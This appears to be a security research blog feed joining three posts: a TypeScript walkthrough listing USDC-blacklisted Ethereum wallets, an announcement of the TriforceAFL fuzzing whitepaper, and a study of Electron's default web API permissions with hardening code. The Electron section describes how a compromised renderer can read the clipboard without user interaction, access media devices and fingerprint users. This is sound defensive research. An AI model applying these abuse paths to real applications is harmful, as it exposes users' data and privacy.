Now that we understand how Circle can block token transfers, we can play with the smart contract to determine whether an address is banned. For the demo we will use the wallet address of Vitalik Buterin, one of Ethereum’s founders.

The smart contract exports a function called isBlacklisted; all we need to do is to call it with the desired address.

Below is a small TypeScript piece of code that does exactly that:

import "dotenv/config";
import { ethers } from "ethers";

const USDC_PROXY_ADDRESS = "0xB7277a6e95992041568D9391D09d0122023778A2";
const VITALIK_WALLET = "0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B";

const isBlacklisted = async (
   usdcContract: ethers.Contract,
   address: string
) => {
   const ret = await usdcContract.isBlacklisted(address);
   console.log(`Wallet ${address} is ${ret ? "" : "not "}blacklisted.`);
};

const main = async () => {
   const provider = new ethers.providers.JsonRpcProvider(
      process.env.HTTPS_ENDPOINT
   );

   const usdcContract = new ethers.Contract(
      USDC_PROXY_ADDRESS,
      ["function isBlacklisted(address _account) view returns (bool)"],
      provider
   );

   await isBlacklisted(usdcContract, VITALIK_WALLET);
};

Full code is available here.

$ ts-node src/isblacklisted.ts
Wallet 0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B is not blacklisted.

Vitalik’s wallet is safe!

Or we could simply ask Etherscan again.

How to find all blacklisted addresses

We know how to check whether a single address was banned, but how can we retrieve all blacklisted addresses? Unfortunately for us, transactions are not indexed in the Ethereum blockchain and it is not possible to simply list the content of the mapping.

An important point here: a mapping cannot be used to store secrets. Anyone with a copy of the blockchain can retrieve all transaction data.

One way would be to go through every block and transaction and then dissect them to find transactions to the blacklist() function. However, this would be quite inefficient and extremely slow. Fortunately, Circle implemented an event that is issued every time an address is banned. And unlike transactions, events are indexed.

If we check the blacklist() function code, we can see the event on the last line.

The _account argument is also indexed.

To access logs, we can use the RPC method eth_getLogs() of an Ethereum node. This method accepts a few parameters:

  • fromBlock and toBlock
  • a contract address
  • and an array called topics

Topics are indexed parameters of an event, and they can be viewed as filters. The first topic, topic[0] is always the event signature, a keccak256 hash of the event name and parameters. This is easily computed using the ethers.js library.

ethers.utils.id("Blacklisted(address)");

The hash in our case is:

  • 0xffa4e6181777692565cf28528fc88fd1516ea86b56da075235fa575af6a4b855

The other topics are the arguments. For Blacklisted() it is an address. Since we want to find all events, this argument is left empty.
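
Since an indexed address is left-padded to 32 bytes inside a topic, recovering it is just a matter of dropping the 12 padding bytes; that is exactly what the substr(26) call in the script further down does. A quick sketch (the topic value is Vitalik’s address, padded by hand for illustration):

```typescript
// An indexed address parameter occupies the low 20 bytes of a 32-byte topic:
// "0x" (2 chars) + 24 hex chars of zero padding + 40 hex chars of address.
const topic =
  "0x000000000000000000000000ab5801a7d398351b8be11c439e05c5b3259aec9b";
const address = `0x${topic.slice(26)}`;
console.log(address); // "0xab5801a7d398351b8be11c439e05c5b3259aec9b"
```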

Even with an event filter, searching the entire blockchain would take too long, as there have been too many transactions since the genesis block. In this example we will only list Blacklisted() events that happened on the day of the ban, 08 August 2022.

  • 2022-08-08 00:00
    • block number: 15298283
  • 2022-08-08 23:59
    • block number: 15304705

const filter = {
   address: USDC_ERC20_ADDRESS,
   fromBlock: 15298283,
   toBlock: 15304705,
   topics: [ethers.utils.id("Blacklisted(address)")],
};

Using ethers.js, we can call the getLogs() method using our filter.

const logs = await this.provider.getLogs(filter);

/* Deduplicating addresses. */
this.addresses = [
   ...new Set<string>(
      logs.map((log) =>
         ethers.utils.getAddress(`0x${log.topics[1].substr(26)}`)
      )
   ),
];

All we need to do now is to display the wallet addresses and frozen balances:

const symbol = await this.usdcContract.symbol();
console.log(`[+] ${this.addresses.length} wallets address found:`);

await Promise.all(
   this.addresses.map(async (address) => {
      const amount = await this.usdcContract.balanceOf(address);
      console.log(
         ` - ${address}: ${ethers.utils.formatUnits(amount, "mwei")} ${symbol}`
      );
   })
);

Running the script from the terminal gives us all the wallets that were banned that day.

> ts-node src/findbanned.ts
[+] 38 wallets address found:
- 0x8589427373D6D84E98730D7795D8f6f8731FDA16: 0.0 USDC
- 0xd90e2f925DA726b50C4Ed8D0Fb90Ad053324F31b: 0.0 USDC
- 0xDD4c48C0B24039969fC16D1cdF626eaB821d3384: 149.752 USDC
- 0xD4B88Df4D29F5CedD6857912842cff3b20C8Cfa3: 0.0 USDC
- 0x722122dF12D4e14e13Ac3b6895a86e84145b6967: 0.0 USDC
- 0xFD8610d20aA15b7B2E3Be39B396a1bC3516c7144: 0.0 USDC
- 0xF60dD140cFf0706bAE9Cd734Ac3ae76AD9eBC32A: 0.0 USDC
- 0xd96f2B1c14Db8458374d9Aca76E26c3D18364307: 3900.0 USDC
- 0x910Cbd523D972eb0a6f4cAe4618aD62622b39DbF: 0.0 USDC
- 0x4736dCf1b7A3d580672CcE6E7c65cd5cc9cFBa9D: 71000.0 USDC
- 0xb1C8094B234DcE6e03f10a5b673c1d8C69739A00: 0.0 USDC
- 0xA160cdAB225685dA1d56aa342Ad8841c3b53f291: 0.0 USDC
- 0xBA214C1c1928a32Bffe790263E38B4Af9bFCD659: 0.0 USDC
- 0x22aaA7720ddd5388A3c0A3333430953C68f1849b: 0.0 USDC

[...]

- 0x2717c5e28cf931547B621a5dddb772Ab6A35B701: 0.0 USDC
- 0x178169B423a011fff22B9e3F3abeA13414dDD0F1: 0.0 USDC

As mentioned previously, full code is available here.

Conclusion

Crypto assets are a new kind of asset built on a blossoming technology. Understanding how Circle banned Tornado Cash users was a good excuse to review key concepts and to explore the Ethereum blockchain. However, we have only scratched the surface: other assets may have different implementations, restrictions and trade-offs. So always remember the famous principle: don’t trust, verify!

The post How Circle Banned Tornado Cash Users appeared first on Nettitude Labs.

Whitepaper – Project Triforce: Run AFL On Everything (2017)

27 September 2022 at 19:28

Six years ago, NCC Group researchers Tim Newsham and Jesse Hertz released TriforceAFL – an extension of the American Fuzzy Lop (AFL) fuzzer which supports full-system fuzzing using QEMU – but unfortunately the associated whitepaper for this work was never published. Today, we’re releasing it for the curious reader and historical archives alike. While fuzzing has come a long way since 2016/2017, we hope that this paper will provide some valuable additional detail on TriforceAFL to the research community beyond the original TriforceAFL blog post (2016).

Abstract

In this paper we present Project Triforce, our extension of American Fuzzy Lop (AFL), allowing it to fuzz virtual machines running under QEMU’s full-system emulation mode. We used this framework to build TriforceLinuxSyscallFuzzer (TLSF), a syscall fuzzer which has already found several kernel vulnerabilities. This paper details the iteration and design of both TriforceAFL and TLSF, both of which encountered some interesting obstacles and discoveries. We then analyze crashes found by the fuzzer and discuss future directions, including our work fuzzing OpenBSD.


This whitepaper may be downloaded below:

Diving Into Electron Web API Permissions

26 September 2022 at 22:00

Introduction

When a Chrome user opens a site on the Internet that requests a permission, Chrome displays a large prompt in the top left corner. The prompt remains visible on the page until the user interacts with it, reloads the page, or navigates away. The permission prompt has Block and Allow buttons, and an option to close it. On top of this, Chrome 98 displays the full prompt only if the permission was triggered “through a user gesture when interacting with the site itself”. These precautionary measures are the only things preventing a malicious site from using APIs that could affect user privacy or security.

Chrome Permission Prompt

Since Chrome implements this pop-up box, how does Electron handle permissions? From Electron’s documentation:

“In Electron the permission API is based on Chromium and implements the same types of permissions. By default, Electron will automatically approve all permission requests unless the developer has manually configured a custom handler. While a solid default, security-conscious developers might want to assume the very opposite.”

This approval can lead to serious security and privacy consequences if the renderer process of the Electron application were to be compromised via unsafe navigation (e.g., open redirect, clicking links) or cross-site scripting. We decided to investigate how Electron implements various permission checks to compare Electron’s behavior to that of Chrome and determine how a compromised renderer process may be able to abuse web APIs.

Webcam, Microphone, and Screen Recording Permissions

The webcam, microphone, and screen recording functionalities present a serious risk to users when approval is granted by default. Without implementing a permission handler, an Electron app’s renderer process will have access to a user’s webcam and microphone. However, screen recording requires the Electron app to have configured a source via a desktopCapturer in the main process. This leaves little room for exploitability from the renderer process, unless the application already needs to record a user’s screen.

Electron groups these three into one permission, “media”. In Chrome, these permissions are separate. Electron’s lack of separation is problematic because there may be cases where an application only requires the microphone, for example, but must also be granted access to record video. By default, the application has no way to deny access to video without also denying access to audio. For those wondering: modern Electron apps that seemingly handle microphone and video permissions separately are only tracking and respecting the user’s choices in their UI. An attacker with a compromised renderer could still access any media.

It is also possible to enumerate media devices even when permission has not been granted; in Chrome, by contrast, an origin can only see devices that it has permission to use. The navigator.mediaDevices.enumerateDevices() API will return all of the user’s media devices, which can be used to fingerprint them. For example, we can see a label of “Default - MacBook Pro Microphone (Built-in)”, despite having a deny-all permission handler.

navigator.mediaDevices.enumerateDevices()

To deny access to all media devices (but not prevent enumerating the devices), a permission handler must be implemented in the main process that rejects requests for the “media” permission.
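
A minimal sketch of that decision logic follows; the deny-set and function name are ours, and the Electron wiring is shown only as a comment because it runs inside the main process:

```typescript
// Permissions we never want to grant automatically.
const DENIED_PERMISSIONS = new Set(["media"]);

// Returns true if the permission request should be granted.
function decidePermission(permission: string): boolean {
  return !DENIED_PERMISSIONS.has(permission);
}

// In the Electron main process this would be wired up as:
// session.defaultSession.setPermissionRequestHandler((wc, permission, cb) =>
//   cb(decidePermission(permission))
// );
```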

File System Access API

The File System Access API normally allows access to read and write to local files. In Electron, reading files has been implemented, but writing to files has not, and permission to write is always denied. However, read access is always granted when a user selects a file or directory. In Chrome, when a user selects a file or directory, the browser notifies you that you are granting access to that specific file or directory until all tabs of that site are closed. Chrome also prevents access to directories or files deemed too sensitive to disclose to a site. Both considerations are mentioned in the API’s standard (discussed by the WICG).

  • “User agents should try to make sure that users are aware of what exactly they’re giving websites access to” – implemented in Chrome with the notification after choosing a file or directory
Chrome's prompt: Let site view files?
  • “User agents are encouraged to restrict which directories a user is allowed to select in a directory picker, and potentially even restrict which files the user is allowed to select” – implemented in Chrome by preventing users from sharing certain directories containing system files. In Electron, there is no such notification or prevention. A user is allowed to select their root directory or any other sensitive directory, potentially granting more access than intended to a website. There will be no notification alerting the user of the level of access they will be granting.

Clipboard, Notification, and Idle Detection APIs

For these three APIs, the renderer process is granted access by default. This means a compromised renderer process can read the clipboard, send desktop notifications, and detect when a user is idle.

Clipboard

Access to the user’s clipboard is extremely security-relevant because some users will copy passwords or other sensitive information to the clipboard. Normally, Chromium denies access to reading the clipboard unless it was triggered by a user’s action. However, we found that adding an event handler for the window’s load event would allow us to read the clipboard without user interaction.

Clipboard Reading Callback

To deny access to this API, deny access to the “clipboard-read” permission.

Notifications

Sending desktop notifications is another security-relevant feature because desktop notifications can be used to increase the success rate of phishing or other social engineering attempts.

PoC for Notification API Attack

To deny access to this API, deny access to the “notifications” permission.

Idle Detection

The Idle Detection API is much less security-relevant, but its abuse still represents a violation of user privacy.

Idle Detection API abuse

To deny access to this API, deny access to the “idle-detection” permission.

Local Font Access API

For this API, the renderer process is granted access by default. Furthermore, the main process never receives a permission request. This means that a compromised renderer process can always read a user’s fonts. This behavior has significant privacy implications because the user’s local fonts can be used as a fingerprint for tracking purposes and they may even reveal that a user works for a specific company or organization. Yes, we do use custom fonts for our reports!

Local Font Access API abuse

Security Hardening for Electron App Permissions

What can you do to reduce your Electron application’s risk? You can quickly assess if you are mitigating these issues and the effectiveness of your current mitigations using ElectroNG, the first SAST tool capable of rapid vulnerability detection and identifying missing hardening configurations. Among its many features, ElectroNG features a dedicated check designed to identify if your application is secure from permission-related abuses:

ElectroNG Permission Check

A secure application will usually deny all the permissions for dangerous web APIs by default. This can be achieved by adding a permission handler to a Session as follows:

  ses.setPermissionRequestHandler((webContents, permission, callback) => {
    return callback(false);
  })

If your application needs to allow the renderer process permission to access some web APIs, you can add exceptions by modifying the permission handler. We recommend checking if the origin requesting permission matches an expected origin. It’s a good practice to also set the permission request handler to null first to force any permission to be requested again. Without this, revoked permissions might still be available if they’ve already been used successfully.

session.defaultSession.setPermissionRequestHandler(null);
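
An origin check can be layered on top of such a handler; the sketch below keeps the decision in a standalone function, and the allow-list contents are hypothetical:

```typescript
// Hypothetical allow-list: which origins may use which permissions.
const ALLOWED: Record<string, string[]> = {
  "https://app.example.com": ["notifications"],
};

// Grant only when the requesting origin is allow-listed for that permission.
function shouldGrant(origin: string, permission: string): boolean {
  return (ALLOWED[origin] ?? []).includes(permission);
}

// In the Electron main process:
// ses.setPermissionRequestHandler((webContents, permission, callback) => {
//   const origin = new URL(webContents.getURL()).origin;
//   callback(shouldGrant(origin, permission));
// });
```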

Conclusions

As we discussed, these permissions present significant risk to users even in Electron applications setting the most restrictive webPreferences settings. Because of this, it’s important for security teams & developers to strictly manage the permissions that Electron will automatically approve unless the developer has manually configured a custom handler.
